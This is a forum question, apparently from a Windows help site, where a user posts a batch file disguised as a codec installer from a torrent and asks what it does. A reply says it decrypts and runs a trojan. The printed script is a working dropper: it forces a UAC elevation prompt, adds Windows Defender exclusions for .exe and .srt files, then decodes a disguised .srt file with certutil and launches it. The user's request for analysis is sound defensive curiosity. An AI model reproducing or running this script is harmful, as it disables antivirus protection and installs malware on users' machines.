I recently downloaded a media package from torrent which doesn’t run on vlc and on windows media player it says "The Player might not support the file type or might not support the codec that was used to compress the file". the package also includes a batch file with name Ultra XVid Codec setup. when I tried running asked for some admin permission so I denied and closed it. Later I opened it using vscode and the code was this. just out of curiosity can someone briefly explain what this code tries to do and what threat is posseses.
@echo off
CLS
ECHO.
ECHO ======================================
ECHO ===Running Admin shell please wait====
:init
setlocal DisableDelayedExpansion
set cmdInvoke=1
set winSysFolder=System32
set "batchPath=%~0"
for %%k in (%0) do set batchName=%%~nk
set "vbsGetPrivileges=%temp%OEgetPriv_%batchName%.vbs"
setlocal EnableDelayedExpansion
:checkPrivileges
NET FILE 1>NUL 2>NUL
if '%errorlevel%' == '0' ( goto gotPrivileges ) else ( goto getPrivileges )
:getPrivileges
if '%1'=='ELEV' (echo ELEV & shift /1 & goto gotPrivileges)
ECHO.
ECHO **************************************
ECHO Invoking UAC for Privilege Escalation
ECHO **************************************
ECHO Set UAC = CreateObject^("Shell.Application"^) > "%vbsGetPrivileges%"
ECHO args = "ELEV " >> "%vbsGetPrivileges%"
ECHO For Each strArg in WScript.Arguments >> "%vbsGetPrivileges%"
ECHO args = args ^& strArg ^& " " >> "%vbsGetPrivileges%"
ECHO Next >> "%vbsGetPrivileges%"
if '%cmdInvoke%'=='1' goto InvokeCmd
ECHO UAC.ShellExecute "!batchPath!", args, "", "runas", 1 >> "%vbsGetPrivileges%"
goto ExecElevation
:InvokeCmd
ECHO args = "/c """ + "!batchPath!" + """ " + args >> "%vbsGetPrivileges%"
ECHO UAC.ShellExecute "%SystemRoot%%winSysFolder%cmd.exe", args, "", "runas", 1 >> "%vbsGetPrivileges%"
:ExecElevation
"%SystemRoot%%winSysFolder%WScript.exe" "%vbsGetPrivileges%" %*
exit /B
:gotPrivileges
setlocal & cd /d %~dp0
if '%1'=='ELEV' (del "%vbsGetPrivileges%" 1>nul 2>nul & shift /1)
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExt "exe"
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExt "srt"
ECHO.
ECHO Download update..
ping 127.0.0.1 -n 8 > nul
certutil -decodehex -f 75095_VTS.srt 75095_VTS_tmp.srt
start 75095_VTS_tmp.srt
ECHO %batchName% Arguments: P1=%1 P2=%2 P3=%3 P4=%4 P5=%5 P6=%6 P7=%7 P8=%8 P9=%9
cmd /k
exit
Source: Windows Questions
One Reply to “Can someone explain what this batch file do?”
https://umbrella.cisco.com/blog/cyber-attackers-use-seo-to-spread-malware-through-torrent-files
it will decrypt another file and execute a trojan.